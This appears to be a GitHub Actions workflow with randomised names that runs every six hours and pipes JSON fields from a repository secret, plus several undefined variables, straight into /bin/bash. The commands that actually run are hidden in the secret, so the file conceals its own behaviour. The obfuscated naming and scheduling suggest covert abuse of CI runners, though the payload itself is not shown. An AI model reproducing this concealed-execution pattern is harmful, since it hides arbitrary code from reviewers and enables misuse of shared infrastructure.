name: xiaodafeng3216
on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaodafeng3216
        env:
          zflw80166: ${{ secrets.zflw80166 }}
        run: |
          echo $zflw80166 | jq -r .ddq423 | /bin/bash
          echo $t1430 | jq -r .wh0 | /bin/bash
          echo $qhh70902 | jq -r .vki9334 | /bin/bash
          echo $e5 | jq -r .wlcq1322 | /bin/bash
          echo $gl5606 | jq -r .nprhe31 | /bin/bash
          echo $o6748 | jq -r .j58478 | /bin/bash
          echo $y4249 | jq -r .f36184 | /bin/bash
          echo $vwp84 | jq -r .n19184 | /bin/bash
          echo $c7 | jq -r .catnt34499 | /bin/bash
          echo $ovns39 | jq -r .dcxx710 | /bin/bash
          echo $bivm78237 | jq -r .vlax02 | /bin/bash
          echo $vztt67364 | jq -r .f2 | /bin/bash

